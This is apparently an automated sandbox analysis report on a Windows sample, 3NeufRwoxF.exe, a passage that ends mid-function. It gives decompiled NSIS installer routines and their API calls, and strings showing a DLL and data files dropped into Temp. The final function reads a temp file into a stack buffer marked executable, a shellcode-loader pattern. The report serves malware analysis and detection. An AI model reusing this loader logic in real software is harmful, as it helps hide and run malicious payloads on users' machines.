				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}

0x00401734
0x0040173b
0x00401744
0x00401747
0x0040174a
0x0040174f
0x00401757
0x00401773
0x00401759
0x00401759
0x0040175a
0x0040175a
0x00401779
0x00401783
0x00401783
0x00401787
0x0040178a
0x0040178f
0x00401791
0x00401793
0x00401798
0x00401798
0x004017a3
0x004017a3
0x004017b4
0x004017b6
0x004017b6
0x004017b7
0x004017b7
0x004017ba
0x004017bd
0x004017c0
0x004017c0
0x004017c7
0x004017d6
0x004017db
0x004017de
0x004017e1
0x00000000
0x00000000
0x004017e3
0x004017e6
0x00401840
0x00401845
0x004015a8
0x0040264e
0x0040264e
0x0040287d
0x00402880
0x00402880
0x00000000
0x004017e8
0x004017ee
0x004017f9
0x00401806
0x00401811
0x00401827
0x00401827
0x0040182a
0x00000000
0x00401830
0x00401830
0x00401831
0x0040184e
0x00402886
0x00402886
0x00402886
0x00401833
0x00401833
0x00401834
0x00401492
0x00402200
0x00402200
0x00402200
0x00401831
0x0040182a
0x00402888
0x0040288c
0x0040288c
0x0040185e
0x00401863
0x00401871
0x00401876
0x0040187c
0x00401880
0x00401882
0x0040188a
0x00401896
0x00401884
0x00401884
0x00401888
0x00000000
0x00000000
0x00401888
0x0040189f
0x004018a5
0x004018a7
0x00000000
0x004018ad
0x004018ad
0x004018b0
0x004018c8
0x004018b2
0x004018b5
0x004018be
0x004018be
0x004018cd
0x004018d2
0x004021fb
0x00000000
0x004021fb
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,ytxithcebq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,ytxithcebq,ytxithcebq,00000000,00000000,ytxithcebq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401761
C:\Users\user\AppData\Local\Temp\nsvCA57.tmp, xrefs: 0040177E, 004017ED, 0040180B
ytxithcebq, xrefs: 00401750, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
C:\Users\user\AppData\Local\Temp\nsvCA57.tmp\qvddvmam.dll, xrefs: 00401801, 0040181D

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsvCA57.tmp$C:\Users\user\AppData\Local\Temp\nsvCA57.tmp\qvddvmam.dll$ytxithcebq
API String ID: 1941528284-117887566
Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F01, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

0x00402f06
0x00402f10
0x00402f19
0x00402f1d
0x00402f28
0x00402f28
0x00402f30
0x00402f32
0x00402f39
0x00402f55
0x00402f59
0x00403022
0x00403022
0x00000000
0x00402f68
0x00402f6b
0x00402f71
0x00402f78
0x00402f7b
0x00402f84
0x00402ff1
0x00402ff7
0x00402ff9
0x00402ff9
0x0040300b
0x0040300f
0x00000000
0x00403011
0x00403011
0x00403014
0x0040301a
0x00000000
0x0040301a
0x00402f86
0x00402f89
0x0040301d
0x0040301d
0x00402f8f
0x00402f94
0x00402f94
0x00402f9c
0x00402f9e
0x00402f9e
0x00402faf
0x00402fb3
0x00000000
0x00000000
0x00402fc7
0x00402fcf
0x00402fed
0x00403024
0x00403024
0x00402fd6
0x00402fd6
0x00402fd9
0x00402fdc
0x00402fdf
0x00402fe9
0x00000000
0x00402feb
0x00000000
0x00402feb
0x00402fe9
0x00000000
0x00402fcf
0x00000000
0x00402f94
0x00402f89
0x00402f84
0x00402f7b
0x00402f59
0x00403025
0x00403029

APIs

SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402F28
ReadFile.KERNELBASE(00409128,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
ReadFile.KERNELBASE(00413038,00004000,?,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FAF
WriteFile.KERNELBASE(00000000,00413038,?,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FC7

Strings

80A, xrefs: 00402F8F

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: File$Read$PointerWrite
String ID: 80A
API String ID: 2113905535-195308239
Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040302C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x507f6
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					_t12 =  *0x417040; // 0x42532
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						_t22 =  *0x41f048; // 0x44902
						 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
						E00402BC5(0);
					}
					 *0x40afd0 = 0x40b038;
					 *0x40afd4 = 0x8000; // executed
					_t16 = E00405E9D(0x40afb0); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd0; // 0x40f602
					_t40 = _t39 - 0x40b038;
					if(_t40 == 0) {
						__eflags =  *0x40afcc; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x41703c; // 0x507f6
						if(_t18 -  *0x40afa8 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409014, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afa8 =  *0x40afa8 + _t40;
						_t53 =  *0x40afcc; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}

0x00403030
0x0040303d
0x00403050
0x00403055
0x00403196
0x00403198
0x00000000
0x0040319e
0x00403061
0x00403074
0x0040307a
0x00403080
0x0040308b
0x0040308b
0x00403090
0x00403095
0x0040309d
0x0040309f
0x0040309f
0x004030a8
0x004030af
0x00000000
0x00000000
0x004030b5
0x004030bb
0x004030c1
0x00000000
0x004030c7
0x004030cd
0x004030d7
0x004030ed
0x004030f2
0x004030f7
0x004030fd
0x00403103
0x0040310d
0x00403114
0x00000000
0x00000000
0x00403116
0x0040311c
0x0040311e
0x00403152
0x00403158
0x00000000
0x00000000
0x0040315a
0x0040315c
0x00000000
0x00000000
0x0040315e
0x0040315e
0x00403171
0x00000000
0x00000000
0x00403180
0x00000000
0x00403180
0x0040312e
0x00403136
0x0040318d
0x00403193
0x00403193
0x00000000
0x0040313e
0x0040313e
0x00403144
0x0040314a
0x00000000
0x00000000
0x00000000
0x00403150
0x00403191
0x00403191
0x00000000
0x00403191
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403041

Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
WriteFile.KERNELBASE(0040B038,0040F602,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
SetFilePointer.KERNELBASE(000507F6,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180

Strings

80A, xrefs: 004030A1

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: 80A
API String ID: 2146148272-195308239
Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f51
0x00401f51
0x00401f56
0x00401f5d
0x0040200b
0x00402156
0x00402156
0x0040287d
0x00402880
0x0040288c
0x0040288c
0x00401f6c
0x00401f76
0x00401f79
0x00401f88
0x00401f8c
0x00401f92
0x00401f96
0x00402004
0x00000000
0x00402004
0x00401f98
0x00401fa2
0x00401fa6
0x00401fea
0x00401fa8
0x00401fab
0x00401fae
0x00401fde
0x00401fb0
0x00401fb3
0x00401fbc
0x00401fbe
0x00401fbe
0x00401fbc
0x00401fae
0x00401ff2
0x00401ff9
0x00401ff9
0x00000000
0x00401ff2
0x00401f7c
0x00401f82
0x00401f86
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9

Strings

?B, xrefs: 00401FC7

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: ?B
API String ID: 2987980305-117478770
Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d6
0x004015d8
0x004015db
0x004015e3
0x004015f0
0x004015fd
0x004015fd
0x004015f2
0x004015f3
0x004015fb
0x00000000
0x00000000
0x004015fb
0x004015f0
0x00401600
0x00401603
0x00401605
0x00401606
0x004015c8
0x0040160d
0x0040162d
0x00402156
0x0040160f
0x00401611
0x0040161c
0x00401622
0x00401622
0x00402880
0x0040288c

APIs

Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,73BCF560), ref: 0040561A
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-47812868
Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E

Uniqueness

Uniqueness Score: -1.00%

Function 0040578B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x0040578f
0x00405795
0x00405796
0x00405796
0x00405797
0x0040579e
0x004057a8
0x004057b5
0x004057b8
0x004057c0
0x00000000
0x00000000
0x004057c4
0x00000000
0x00000000
0x004057c6
0x00000000
0x004057c6
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040579E
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040578B, 0040578E
"C:\Users\user\Desktop\3NeufRwoxF.exe" , xrefs: 00405792
nsa, xrefs: 00405797

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\3NeufRwoxF.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2761940440
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5

Uniqueness

Uniqueness Score: -1.00%

Function 72B210A0, Relevance: 6.1, APIs: 4, Instructions: 81
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E72B210A0(void* __ecx, void* __eflags) {
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				char _v20;
				void* _v24;
				long _v28;
				long _v32;
				short _v1072;
				void _v6304;
				void* _t33;
				intOrPtr _t36;
				struct _OVERLAPPED* _t58;
				void* _t66;

				E72B21000(0x189c, __ecx);
				_v20 = 0x77;
				_v18 = 0x75;
				_v16 = 0x61;
				_v14 = 0x74;
				_v12 = 0x70;
				_v10 = 0x65;
				_v8 = 0;
				GetTempPathW(0x103,  &_v1072);
				E72B21030( &_v1072,  &_v20);
				VirtualProtect( &_v6304, 0x1470, 0x40,  &_v28); // executed
				_t33 = CreateFileW( &_v1072, 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_v24 = _t33;
				ReadFile(_v24,  &_v6304, 0x1470,  &_v32, 0); // executed
				_t58 = 0;
				while(1) {
					_t36 =  *((intOrPtr*)(_t66 + _t58 - 0x189c));
					if(_t58 == 0x1470) {
						break;
					}
